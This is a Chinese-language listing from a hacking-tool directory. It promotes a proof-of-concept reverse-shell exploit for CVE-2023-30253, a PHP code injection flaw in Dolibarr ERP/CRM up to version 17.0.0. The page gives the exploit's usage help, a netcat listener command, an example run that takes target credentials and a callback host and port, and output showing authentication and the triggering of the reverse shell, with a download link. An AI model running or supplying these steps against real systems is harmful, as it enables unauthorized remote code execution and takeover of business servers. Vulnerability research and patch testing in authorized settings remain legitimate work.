Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 — 针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的反向 Shell POC 漏洞利用程序,PHP 代码注入 | Kitploit
工具/GitHubGitHub/nikn0laty/exploit-for-dolibarr-17.0.0-cve-2023-30253
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubnikn0laty/exploit-for-dolibarr-17.0.0-cve-2023-30253

Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的反向 Shell POC 漏洞利用程序,PHP 代码注入

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
4172年前Kitploit 审核通过

针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的 POC 漏洞利用

针对 Dolibarr <= 17.0.0 (CVE-2023-30253) 的反向 Shell POC 漏洞利用,PHP 代码注入

有关该漏洞的更多详情,请参见 此处

PoC

exploit 的帮助:

root@kitploit:~
➜  python3 exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit

在你的主机上运行 netcat:

root@kitploit:~
➜ nc -lvnp 9001

运行 exploit(示例):

root@kitploit:~
➜ python3 exploit.py http://example.com login passsword 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
下载工具